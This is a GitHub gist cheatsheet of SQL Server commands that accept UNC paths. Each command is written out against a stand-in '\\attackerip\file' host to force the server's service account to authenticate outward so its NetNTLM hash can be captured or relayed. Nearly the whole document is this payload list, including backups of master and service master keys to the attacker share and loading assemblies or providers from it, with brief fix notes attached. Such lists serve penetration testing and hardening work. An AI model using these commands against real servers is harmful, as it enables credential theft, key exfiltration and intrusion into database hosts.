Forked from nullbind/SQL Server UNC Path Injection Cheatsheet
Created
November 10, 2016 13:54
-
-
Save jbarcia/d6fc126e6f622271f9fb18ea6ef6ad2d to your computer and use it in GitHub Desktop.
SQL Server UNC Path Injection Cheatsheet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This is a list of SQL Server commands that support UNC path [injections] by default. | |
| The injections can be used to capture or replay the NetNTLM password hash of the | |
| Windows account used to run the SQL Server service. The SQL Server service account | |
| has sysadmin privileges by default in all versions of SQL Server. | |
| Note: This list is most likely not complete. | |
| ----------------------------------------------------------------------- | |
| -- UNC Path Injections Executable by the Public Fixed Server Role | |
| ----------------------------------------------------------------------- | |
| -- Note: All are supported by SQL Server 2000 to 2016 (excluding azure) | |
| -- XP_DIRTREE Extended Stored Procedure | |
| -- Fix: "revoke execute on xp_dirtree to public" | |
| xp_dirtree '\\attackerip\file' | |
| GO | |
| -- XP_FILEEXIST Extended Stored Procedure | |
| -- Fix: "revoke execute on xp_fileexist to public" | |
| xp_fileexist '\\attackerip\file' | |
| GO | |
| -- BACKUP Command | |
| -- Note: The Public role can't actually execute the backup, but the UNC path is resolved prior to the authorization check. | |
| -- Fix: https://technet.microsoft.com/library/security/MS16-131 | |
| -- Fix note: No patch is available for SQL Server 2000 to 2008, because they are on longer supported. Upgrade if this is you. | |
| BACKUP LOG [TESTING] TO DISK = '\\attackerip\file' | |
| GO | |
| BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file' | |
| GO | |
| -- RESTORE Command | |
| -- Note: The Public role can't actually execute the RESTORE, but the UNC path is resolved prior to the authorization check. | |
| -- Fix: https://technet.microsoft.com/library/security/MS16-131 | |
| -- Fix note: No patch is available for SQL Server 2000 to 2008, because they are on longer supported. Upgrade if this is you. | |
| RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file' | |
| GO | |
| RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file' | |
| GO | |
| RESTORE HEADERONLY FROM DISK = '\\attackerip\file' | |
| GO | |
| RESTORE FILELISTONLY FROM DISK = '\\attackerip\file' | |
| GO | |
| RESTORE LABELONLY FROM DISK = '\\attackerip\file' | |
| GO | |
| RESTORE REWINDONLY FROM DISK = '\\attackerip\file' | |
| GO | |
| RESTORE VERIFYONLY FROM DISK = '\\attackerip\file' | |
| GO | |
| ------------------------------------------------------ | |
| -- Executable by the Sysadmin fixed server | |
| -- and with other non Public roles / privileges | |
| ------------------------------------------------------ | |
| -- Note: Almost every function and stored procedure that supports a file path allows UNC paths by design. | |
| -- Create assembly | |
| CREATE ASSEMBLY HelloWorld FROM '\\attackerip\file' WITH PERMISSION_SET = SAFE; | |
| GO | |
| -- Add exteneded stored procedure | |
| sp_addextendedproc 'xp_hello','\\attackerip\file' | |
| -- Create Certificate | |
| CREATE CERTIFICATE testing123 | |
| FROM EXECUTABLE FILE = '\\attackerip\file'; | |
| GO | |
| -- Backup Certificate | |
| BACKUP CERTIFICATE test01 TO FILE = '\\attackerip\file' | |
| WITH PRIVATE KEY (decryption by password = 'superpassword', | |
| FILE = '\\attackerip\file', | |
| encryption by password = 'superpassword'); | |
| go | |
| -- Backup to file - Master Key | |
| BACKUP MASTER KEY TO FILE = '\\attackerip\file' | |
| ENCRYPTION BY PASSWORD = 'password' | |
| GO | |
| -- Backup to file - Service Master Key | |
| BACKUP SERVICE MASTER KEY TO FILE = '\\attackerip\file' | |
| ENCRYPTION BY PASSWORD = 'password' | |
| go | |
| -- Restore from file - Master Key | |
| RESTORE MASTER KEY FROM FILE = '\\attackerip\file' | |
| DECRYPTION BY PASSWORD = 'password' | |
| ENCRYPTION BY PASSWORD = 'password' | |
| go | |
| -- Restore from file - Service Master Key | |
| RESTORE SERVICE MASTER KEY FROM FILE = '\\attackerip\file' | |
| DECRYPTION BY PASSWORD = 'password' | |
| go | |
| -- Read data from file - Bulk insert 1 | |
| CREATE TABLE #TEXTFILE (column1 NVARCHAR(100)) | |
| BULK INSERT #TEXTFILE FROM '\\attackerip\file' | |
| DROP TABLE #TEXTFILE | |
| -- Read data from file - Bulk insert 2 | |
| CREATE TABLE #TEXTFILE (column1 NVARCHAR(100)) | |
| BULK INSERT #TEXTFILE FROM '\\attackerip\file' | |
| WITH (FORMATFILE = '\\testing21\file') | |
| DROP TABLE #TEXTFILE | |
| -- Read data from a file - fn_xe_file_target_read_file | |
| SELECT * FROM sys.fn_xe_file_target_read_file ('\\attackerip\file','\\attackerip\file',null,null) | |
| GO | |
| -- Read data from a file - fn_get_audit_file | |
| SELECT * FROM sys.fn_get_audit_file ('\\attackerip\file','\\attackerip\file',default,default); | |
| GO | |
| -- Create Server Audit to File | |
| CREATE SERVER AUDIT TESTING TO FILE ( FILEPATH = '\\attackerip\file'); | |
| GO | |
| -- Install a cryptographic provider | |
| sp_configure 'EKM provider enabled',1 | |
| RECONFIGURE | |
| GO | |
| CREATE CRYPTOGRAPHIC PROVIDER SecurityProvider FROM FILE = '\\attackerip\file'; | |
| GO | |
| -- External file format - Azure only | |
| CREATE EXTERNAL FILE FORMAT myfileformat WITH (FORMATFILE = '\\testing21\file'); | |
| GO | |
| -- xp_subdirs | |
| xp_subdirs '\\attackerip\file' | |
| -- xp_cmdshell | |
| xp_cmdshell 'dir \\attackerip\file' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment